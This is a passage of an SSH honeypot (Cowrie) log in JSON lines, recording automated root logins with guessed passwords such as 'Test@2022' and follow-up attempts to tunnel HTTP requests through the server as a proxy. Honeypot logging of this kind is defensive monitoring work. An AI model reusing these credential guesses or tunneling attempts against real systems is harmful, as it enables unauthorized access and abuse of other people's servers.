{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.882321Z","src_ip":"77.83.207.83","session":"a1b043fac203"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.923156Z","src_ip":"77.83.207.83","session":"a1b043fac203"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.928660Z","src_ip":"212.227.235.229","session":"3ae4283b8c70"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.174407Z","src_ip":"77.83.207.83","session":"a1b043fac203"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23697,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23697","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.225680Z","session":"a1b043fac203"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50944,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6efef015831","protocol":"ssh","message":"New connection: 212.227.235.229:50944 (1.2.3.4:22) [session: b6efef015831]","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.240086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.240949Z","src_ip":"212.227.235.229","session":"b6efef015831"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.276347Z","src_ip":"77.83.207.83","session":"a1b043fac203"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":4188,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4188","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.416561Z","session":"a1b043fac203"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.466990Z","src_ip":"77.83.207.83","session":"a1b043fac203"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.554417Z","src_ip":"212.227.235.229","session":"b6efef015831"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":5360,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:5360","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.608769Z","session":"a1b043fac203"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.659177Z","src_ip":"77.83.207.83","session":"a1b043fac203"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.710045Z","src_ip":"77.83.207.83","session":"a1b043fac203"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19207,"dst_ip":"1.2.3.4","dst_port":22,"session":"6784749ee083","protocol":"ssh","message":"New connection: 77.83.207.83:19207 (1.2.3.4:22) [session: 6784749ee083]","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.759349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.768471Z","src_ip":"77.83.207.83","session":"6784749ee083"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:51.809527Z","src_ip":"77.83.207.83","session":"6784749ee083"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.057810Z","src_ip":"77.83.207.83","session":"6784749ee083"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5251,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5251","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.108808Z","session":"6784749ee083"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.158864Z","src_ip":"77.83.207.83","session":"6784749ee083"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":11921,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:11921","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.300375Z","session":"6784749ee083"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.350220Z","src_ip":"77.83.207.83","session":"6784749ee083"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":24248,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24248","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.492706Z","session":"6784749ee083"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.542454Z","src_ip":"77.83.207.83","session":"6784749ee083"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.586850Z","src_ip":"212.227.235.229","session":"e204ebe5e543"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.592517Z","src_ip":"77.83.207.83","session":"6784749ee083"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19320,"dst_ip":"1.2.3.4","dst_port":22,"session":"24a2d2707755","protocol":"ssh","message":"New connection: 77.83.207.83:19320 (1.2.3.4:22) [session: 24a2d2707755]","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.643312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.653638Z","src_ip":"77.83.207.83","session":"24a2d2707755"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.694572Z","src_ip":"77.83.207.83","session":"24a2d2707755"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.849165Z","src_ip":"212.227.235.229","session":"b6efef015831"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:52.949105Z","src_ip":"77.83.207.83","session":"24a2d2707755"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32574,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32574","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.001240Z","session":"24a2d2707755"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.053258Z","src_ip":"77.83.207.83","session":"24a2d2707755"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":27951,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27951","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.197479Z","session":"24a2d2707755"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.248461Z","src_ip":"77.83.207.83","session":"24a2d2707755"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":16874,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16874","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.393599Z","session":"24a2d2707755"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.445107Z","src_ip":"77.83.207.83","session":"24a2d2707755"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.497348Z","src_ip":"77.83.207.83","session":"24a2d2707755"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19474,"dst_ip":"1.2.3.4","dst_port":22,"session":"66fca053e103","protocol":"ssh","message":"New connection: 77.83.207.83:19474 (1.2.3.4:22) [session: 66fca053e103]","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.546575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.556385Z","src_ip":"77.83.207.83","session":"66fca053e103"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.577780Z","src_ip":"212.227.235.229","session":"b6efef015831"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.578808Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.597217Z","src_ip":"77.83.207.83","session":"66fca053e103"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.848969Z","src_ip":"77.83.207.83","session":"66fca053e103"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30360,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:30360","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.900242Z","session":"66fca053e103"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:53.950695Z","src_ip":"77.83.207.83","session":"66fca053e103"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":10215,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:10215","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.092763Z","session":"66fca053e103"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.143358Z","src_ip":"77.83.207.83","session":"66fca053e103"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":9461,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9461","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.285054Z","session":"66fca053e103"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.335564Z","src_ip":"77.83.207.83","session":"66fca053e103"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.388040Z","src_ip":"77.83.207.83","session":"66fca053e103"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19587,"dst_ip":"1.2.3.4","dst_port":22,"session":"08cba907259a","protocol":"ssh","message":"New connection: 77.83.207.83:19587 (1.2.3.4:22) [session: 08cba907259a]","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.436900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.437587Z","src_ip":"77.83.207.83","session":"08cba907259a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-